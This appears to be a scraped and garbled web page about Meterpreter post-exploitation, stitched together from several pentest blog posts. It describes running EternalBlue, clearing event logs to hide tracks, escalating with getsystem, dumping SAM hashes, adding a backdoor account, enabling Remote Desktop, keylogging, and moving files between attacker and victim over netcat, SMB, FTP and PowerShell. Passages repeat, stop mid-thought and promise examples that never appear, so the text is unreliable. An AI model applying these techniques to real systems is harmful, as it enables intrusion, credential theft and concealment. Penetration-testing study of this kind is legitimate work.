Meterpreter download file from victim

There are many more commands, scripts and modules supported by Meterpreter, far more than we can cover in one blog post.

What's left to do is wrap up. One way to wrap up nicely is already covered in the previous chapters. Scripts and modules often leave a revert-script to undo all actions made by the script on the target machine.

See for example the chapter on creating a new account. It may be necessary to cover up any tracks we may have left during the session phase 5. The event log may contain important information of our activity on the machine.

We can clear it with the clearev -command:. When running Meterpreter, it is possible to push the current session to the background and start a new session on a different target. This can be achieved with the background -command. In case we have multiple sessions of shells and Meterpreter running, we may need to interact with them all at once or individually.

In msfconsole, use the sessions -command to display any active sessions. These sessions can be shells, Meterpreter sessions, VNC, etc. In the following example, the current Meterpreter sessions is sent to the background after which we close it:. There are 3 types of payload modules in the Metasploit framework: Singles Stagers Stages Singles are payloads that are self-contained and completely standalone.

In Metasploit, the type of payload can be deducted from its name. Deploying Meterpreter In the article about Metasploit, we setup the Eternalblue exploit to work with the default shell stage as payload. Post-exploitation Now we have successfully executed the Eternalblue exploit and installed Meterpreter on the target system, we have many possibilities. An example of the download command is shown below: Privilege escalation Depending on the exploit you used, you may find that your Meterpreter session only has limited user rights.

It's a good thing Meterpreter has a getsystem -command that will attempt a number of different techniques and exploits to gain local system privileges on the target system: The getuid -command retrieves the user that Meterpreter is running as. Harvest credentials The hashdump post module will dump the local users accounts from the SAM database. Execute a program It is possible to execute an application on the target machine by running the execute -command.

Options: -H Create the process hidden from view -a Arguments to pass to the command -i Interact with the process after creating it -m Execute from memory -t Execute process with currently impersonated thread token -s Execute process in a given session as the session user Regarding the last option -s , we can find out the available sessions by using the enumdesktops -command.

Create a new account A lot less stealthy is the creation of a new user account on the target machine. Adding a new account is done by calling the getgui -script and providing the user and password with respectively the -u and -p options: Note the last line of the output. A snapshot from the target machine shows that this failed as the new 'Hacker' account can be clearly seen: Enable remote desktop As soon as we have a new user with remote desktop rights installed, we can use these credentials to start a remote desktop session.

By providing the -e parameter it will make sure the target has Remote Desktop enabled and will remain enabled when the machine is restarted: Note in the last line that this script also made a revert-script to undo all changes made on the target machine. Before starting the Remote Desktop session, we may want to check how long the remote user has been idle by calling the idletime -command: This reduced the risk of being discovered when a user is logged-in as he will be serviced with the following message: The image below shows the result of a successful Remote Desktop connection with the newly created 'Hacker' account: Keylogging Meterpreter can also be used to log keystrokes on the target machine.

Migrating to another process Meterpreter can be attached to an existing process or started as a separate, new process. Hold my beer First we want to know which processes are running on the target machine by using the ps -command: In order to find out which process we're currently attached to, run the getpid -command. Wrapping up There are many more commands, scripts and modules supported by Meterpreter, far more than we can cover in one blog post. Then payload grants access to the attacker restricted or full-fledged, depends upon the contents of payload.

To further elaborate on the functioning of payloads, we must discuss its types, which are 3 in total:. These payloads are completely self-contained, which means that these can be as basic as gatekeeper codes that lets user into a target system.

Stagers are payloads that gather applications within the target system and sends it to the attacker. It establishes the connection between the victim to our local machine. Once the stagers have access to the system, they download the stages modules.

Stages modules remove the size cap on the meterpreter. You can work out the type of payload by figuring its name.

First of all, start the msf console by typing the following terminal command in the Kali terminal window. We will begin by setting up the Eternal Blue exploit. I must emphasize that these techniques should only be used for legitimate purposes, either on a test network, or for penetration testing where you have written permission from the data owner.

You are heir to your actions, make sure that everything you do is ethical, and use these techniques for good purposes. We will skip the exploitation phase in these examples, to focus on the post-exploitation and data collection aspects.

So, we have exploited a system, and find ourselves at friendly Meterpreter console prompt. Posted by Ben at Anonymous 15 November at Anonymous 9 February at We will use the scp utility to transfer the file from the victim machine to ours.

With this method we will host our file to upload with a simple python server, which could also be hosted by any other server but we will use this for its simplicity, and then download it with the DownloadFile function of powershell. This tool is designed to download certificates but as we saw in this post can be used for more things. Netcat This method is similar to the one used in netcat with linux. In order to make the transfer in this way we must have the netcat binary for our windows.

Windows has an FTP client pre-installed so we will connect and download the desired file. Our shell may not be interactive and we have to use a command file to connect and download the file. SMB Through impacket-smbserver we will mount a smb folder on our machine, which we will access from the victim machine, downloading the file.

With this method we will mount a temporary FTP in the folder where our file is located but this time with write permission. Later we will access from the victim and upload our file. Netcat This method is similar to the one used in netcat to upload files but in reverse. SMB Through impacket-smbserver we will mount a smb folder on our machine that we will access from the victim machine to copy the file to be downloaded in our SMB folder Attacking machine command:. Powercat In this method we will load in memory the powercat module, a tool with which we can load a shell, send files.